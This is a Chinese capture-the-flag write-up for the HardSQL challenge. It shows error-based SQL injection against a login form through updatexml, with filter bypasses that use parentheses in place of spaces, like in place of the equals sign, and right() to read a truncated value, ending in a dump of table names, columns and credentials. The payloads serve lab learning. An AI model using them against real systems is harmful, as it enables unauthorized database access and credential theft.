• [极客大挑战 2019]HardSQL


    首先万能密码 admin'#,报出密码错误。

    admin' union select 1,2,3#查询报出密另一种错误,开来是检测到恶意字符了。

    先考虑union绕过,

    单独拿出来试,大小写注释双写等都无法报出 wrong password 这个错误信息,说明没有绕过检测成功。

    select通过以上方法也是无法绕。

    好多检测过滤不掉了,联合查询此题看来是无法用了。

    尝试报错注入。

    admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))#或者用异或代替or

    admin'^(updatexml(1,concat(0x7e,database(),0x7e),1))#

    得到数据库

    admin'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database)),0x7e),1))#
    用括号进行绕过空格。

    updatexml concat select,information往后逐个检测是否有过滤,检查到等于号时

     发现等于号原来也被过滤了,可用like进行代替。

    admin'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#

    admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#

     admin'or(updatexml(1,concat(0x7e,(select(group_concat(username,'~',password))from(H4rDsq1)),0x7e),1))#

     只得到左边的flag,看来是对数据库的数据显示有长度限制,只显示了左边的26个字符

    网上的一个骚姿势是用right函数right(password,27)显示右边的26个字符

    拼接得到flag。

  • 相关阅读:
    Topics
    telnetlib-telnet客户端操作
    logging-日志信息管理
    B.2 工具spy++
    B.1 XPath 获取技巧
    pyinstaller-将Python程序打包成一个独立可执行软件包
    探讨HTTP中敏感数据的安全性传输方案
    shell->一个经典的shell脚本结构
    c->再次封装已有函数的快速方法
    c->推荐的更安全的代码写法
  • 原文地址:https://www.cnblogs.com/akger/p/15125868.html
Copyright © 2020-2023  润新知